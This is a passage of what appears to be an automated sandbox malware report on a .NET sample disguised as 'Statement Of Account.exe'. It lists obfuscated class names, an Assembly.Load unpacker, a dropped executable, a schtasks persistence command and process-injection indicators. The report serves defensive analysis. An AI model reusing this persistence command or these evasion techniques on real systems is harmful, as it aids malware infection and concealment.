          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: cmutil.dll
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dll
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dll
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dll
          Source: C:\Users\user\Desktop\Statement Of Account.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Statement Of Account.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Statement Of Account.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Statement Of Account.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Statement Of Account.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1770419529.0000000004618000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004970000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2938861388.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000003.1773733976.00000000047C1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1774876929.000000000499D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000003.1772583517.00000000047EF000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1778056834.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: IuBP.pdb source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
          Source: Binary string: IuBP.pdbSHA256 source: Statement Of Account.exe, SdYCcXyq.exe.0.dr
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.2955594862.0000000010C3F000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937707694.0000000002C6C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2940096728.0000000004EBF000.00000004.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Statement Of Account.exe, Form1.cs.Net Code: InitializeComponent
          Source: SdYCcXyq.exe.0.dr, Form1.cs.Net Code: InitializeComponent
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs.Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs.Net Code: LQXNHvCMSd System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\Statement Of Account.exeCode function: 0_2_014AF1D0 push esp; iretd 0_2_014AF1D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F709AD push ecx; mov dword ptr [esp], ecx8_2_00F709B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F41FEC push eax; iretd 8_2_00F41FED
          Source: C:\Windows\explorer.exeCode function: 9_2_0F424B02 push esp; retn 0000h9_2_0F424B03
          Source: C:\Windows\explorer.exeCode function: 9_2_0F424B1E push esp; retn 0000h9_2_0F424B1F
          Source: C:\Windows\explorer.exeCode function: 9_2_0F4249B5 push esp; retn 0000h9_2_0F424AE7
          Source: C:\Windows\explorer.exeCode function: 9_2_0F9079B5 push esp; retn 0000h9_2_0F907AE7
          Source: C:\Windows\explorer.exeCode function: 9_2_0F907B1E push esp; retn 0000h9_2_0F907B1F
          Source: C:\Windows\explorer.exeCode function: 9_2_0F907B02 push esp; retn 0000h9_2_0F907B03
          Source: C:\Windows\explorer.exeCode function: 9_2_109989B5 push esp; retn 0000h9_2_10998AE7
          Source: C:\Windows\explorer.exeCode function: 9_2_10998B1E push esp; retn 0000h9_2_10998B1F
          Source: C:\Windows\explorer.exeCode function: 9_2_10998B02 push esp; retn 0000h9_2_10998B03
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeCode function: 11_2_00DAF1D0 push esp; iretd 11_2_00DAF1D1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00417024 push ecx; iretd 14_2_00417025
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004170C2 push edx; ret 14_2_004170CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004073EB push ebp; ret 14_2_004073EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00416CC8 push D1939A9Fh; retf 14_2_00416CCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D4B5 push eax; ret 14_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D56C push eax; ret 14_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D502 push eax; ret 14_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041D50B push eax; ret 14_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0148B008 push es; iretd 14_2_0148B009
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0148135E push eax; iretd 14_2_01481369
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0148225F pushad ; ret 14_2_014827F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014827FA pushad ; ret 14_2_014827F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01489939 push es; iretd 14_2_01489940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_014B09AD push ecx; mov dword ptr [esp], ecx14_2_014B09B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0148283D push eax; iretd 14_2_01482858
          Source: Statement Of Account.exeStatic PE information: section name: .text entropy: 7.029755289423976
          Source: SdYCcXyq.exe.0.drStatic PE information: section name: .text entropy: 7.029755289423976
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Bcn4S3hlHm4ofn0hWj.csHigh entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, IINHKBNMRCCi1qwcT4.csHigh entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, zWJJGGvxAwIgbu8YWv.csHigh entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, y8skBgpa9DSqAAHi65.csHigh entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, KlLQrwBg4x55Bf4v3j.csHigh entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.csHigh entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, uoIQEWIyxOpt3scd2T.csHigh entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.csHigh entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, c3OREwnQa3GNYU832f.csHigh entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, eKk7ynaiv2Ji3kdDNx.csHigh entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vaiTpIWP0Ndo0ZuNPf.csHigh entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, h6IC2siSXaigkWxfxe.csHigh entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, taVahudoRs29QscL9X.csHigh entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, FoLy8GswBljqbcaAATd.csHigh entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, vL6tORGBO4iNhhYxw5.csHigh entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, TtlxsAzSTRsL7Foskh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, UZ9qWJD1Wm6HGuskXY.csHigh entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, W7eOYc6mPKkSUdZ3uK.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, lu1UrfsLPxGyI9Nnu1R.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
          Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, MnUDt3mjFUoMxNxTsw.csHigh entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Bcn4S3hlHm4ofn0hWj.csHigh entropy of concatenated method names: 'GDEHxgDGA', 'tYj5dHTDg', 'JNoeq4kWd', 'g5t8HqLSZ', 'YBUIgkyS1', 'UjZZk3M4o', 'ql6t42cGZ0WDyn0MLS', 'bCHSOedbw4bS5XncxO', 'auYc4Z6cj', 'VXGfx1i9m'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, IINHKBNMRCCi1qwcT4.csHigh entropy of concatenated method names: 'g3psCh6ggw', 'zWjsl9TAIW', 'RyxsSOpt3s', 'rd2stT1CJ0', 'v08so1KPlL', 'wrwsyg4x55', 'iwioIk0swFUEZBibht', 'pQqv78jX3pgowug16i', 'GN4ssNUZeQ', 'b3gsL2P2Ja'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, zWJJGGvxAwIgbu8YWv.csHigh entropy of concatenated method names: 'Dispose', 'cLPsm1QABu', 'JrdhXYY10i', 'Eu711fIRHP', 'aQLsa6tORB', 'u4iszNhhYx', 'ProcessDialogKey', 'a5nhwnUDt3', 'VFUhsoMxNx', 'hswhhUKk7y'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, y8skBgpa9DSqAAHi65.csHigh entropy of concatenated method names: 'wXxCMBhITq', 'iSNCFpQWTu', 'TmGCykQv91', 'pGbVCy6fmRrj8w83J3B', 'HX57Yr6dij3cDcw8nZE', 'KGslbe62CCecrUoAl2Q'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, KlLQrwBg4x55Bf4v3j.csHigh entropy of concatenated method names: 'hshbUAEa38', 'BOtbvG5rar', 'YW1bTDUetD', 'P1NbCLn0AI', 'xPublVLFwq', 'rkLTYjYuHM', 'eolTuOiEu1', 'HO7Tj2Mlgd', 'GgATGvvLUK', 'swMTmE533E'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.csHigh entropy of concatenated method names: 'GQCLU1fsBV', 'OggLgSfqfP', 'k6mLv8Wdpm', 'tLvL6mlKpe', 'M6iLTTDO5d', 'jdVLbZ7tSH', 'CHqLCehSyg', 'BXRLlYQvvA', 'FrZLE7YZD6', 'PO8LScWh16'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, uoIQEWIyxOpt3scd2T.csHigh entropy of concatenated method names: 'q0c65vZu1H', 'lTh6ebi0b9', 'l5T6KLhHD3', 'tta6IraGW9', 'IRt6op2078', 'mwJ6yhIO7r', 'vwj6M2CwEQ', 'v9u6cEQGaY', 'uL26Fofc0L', 'tya6f8vOTy'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.csHigh entropy of concatenated method names: 'bZTvW88oku', 'B2dvq6nDRs', 'dYWviVhG8n', 'lGRvD7C9SJ', 'msIvYjmoSw', 'cJbvuxMQR0', 'tuBvjL7PIo', 'DB1vGnChZg', 'wGEvmmajPa', 'gB1vaxe9Bb'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, c3OREwnQa3GNYU832f.csHigh entropy of concatenated method names: 'EaXC2J1Xfr', 'q9PC0j1Kck', 'FR7CHFr0Yq', 'GKfC5vyv6g', 'cYYCRN9RVD', 'pieCeE21AL', 'XsQC8srmZf', 'xJJCKmrAax', 'N1MCIvjgZg', 'zSFCZjkWBc'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, eKk7ynaiv2Ji3kdDNx.csHigh entropy of concatenated method names: 'bxqFskNs4A', 'J9gFLHpSnj', 'jpcFNWRTN6', 'hTuFggBc9P', 'jkeFvFY9Qr', 'R1DFTsoCBK', 'eKHFbg0uBg', 'wP7cjoMBvv', 'BBIcGdsMpL', 'jmDcmCqjoF'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vaiTpIWP0Ndo0ZuNPf.csHigh entropy of concatenated method names: 'CIlo3uUZUZ', 'C9doAcyHgg', 'TROoWBGsWm', 'CudoqFX6Q1', 'H8ToX9CNYF', 'y90o9Aw5ue', 'vseoJMmbmu', 'VWCoVvOFsG', 'aFsoPsXTUF', 'MXfoxfrLjf'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, h6IC2siSXaigkWxfxe.csHigh entropy of concatenated method names: 'ToString', 'mn6ykMiSYS', 'mucyXXPffh', 'VnEy9UvwQp', 'hu7yJJjjyS', 'piAyV81VFy', 'eTyyPKh7j4', 'GBqyxI8Y4L', 'KhFypvEk8o', 'j8EyngdZ1j'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, taVahudoRs29QscL9X.csHigh entropy of concatenated method names: 'vSe7KJ0EA2', 'waj7IRQ96c', 'GB47BX7vT7', 'HVS7XCJfIW', 'Q3w7JY2PRd', 'BSV7Vw2uBZ', 'Coo7xxFsvw', 'MM97pZdd8W', 'E4873BV1La', 'N717kAEdCD'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, FoLy8GswBljqbcaAATd.csHigh entropy of concatenated method names: 'IO2F2vFQxi', 'GeSF0fhAIc', 'lI2FHDKJtR', 'aShF5GF4rh', 'n9mFRmsYhN', 'attFeXbRQ7', 'qaOF8gOZKj', 'jRfFKGpl92', 'AP4FIDSJok', 'qawFZXBVAy'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, vL6tORGBO4iNhhYxw5.csHigh entropy of concatenated method names: 'lEUcgSVhVm', 'c1RcvQsPDR', 'NqLc6nZ1b9', 'DTWcTWbMZk', 'o6CcbG8qpS', 'GSxcCU9ntO', 'cQqclevKSr', 'eUbcEOyuIk', 'CiqcS7EQY0', 'gGactN4U3c'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, TtlxsAzSTRsL7Foskh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DatF7wtdUY', 'fHNFoj4Gc6', 'sTvFyYjGqo', 'k9cFMSVY0l', 'gBwFcrAsyQ', 'bEDFFmGWmG', 'MM5FfmHqty'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, UZ9qWJD1Wm6HGuskXY.csHigh entropy of concatenated method names: 'MuxMSRIqLf', 'eoAMt7Bf3x', 'ToString', 'z4ZMgtlE6w', 'qi8MvO2l3Q', 'M5SM6Oc8xJ', 'oEcMTp3ZPV', 'sU0MbiX6NP', 'uORMC1EheX', 'mghMlaaqJi'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, W7eOYc6mPKkSUdZ3uK.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm6vhmyEc8U', 'jPmhauc7Tw', 'iruhzclfhq', 'vKxLwVGDsP', 'JM3Ls5bQTN', 'KLwLh5M3fb', 'RgbLLgVK73', 'GxIJyZqufdqH2nZOs2A'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, lu1UrfsLPxGyI9Nnu1R.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wvGfWtnNM5', 'Lmhfq335DW', 'q4vfiq4ZXL', 'mXPfDpR7K3', 'M6efYX4oOZ', 'mVHfuybBbm', 'fFVfjwAtBj'
          Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, MnUDt3mjFUoMxNxTsw.csHigh entropy of concatenated method names: 'wFBcBTIJfC', 'vFkcXDm3at', 'nlrc9wGx7x', 'WOGcJO0prD', 'J7DcW0lxRi', 'oo2cVoGcMv', 'Next', 'Next', 'Next', 'NextBytes'
          Source: C:\Users\user\Desktop\Statement Of Account.exeFile created: C:\Users\user\AppData\Roaming\SdYCcXyq.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
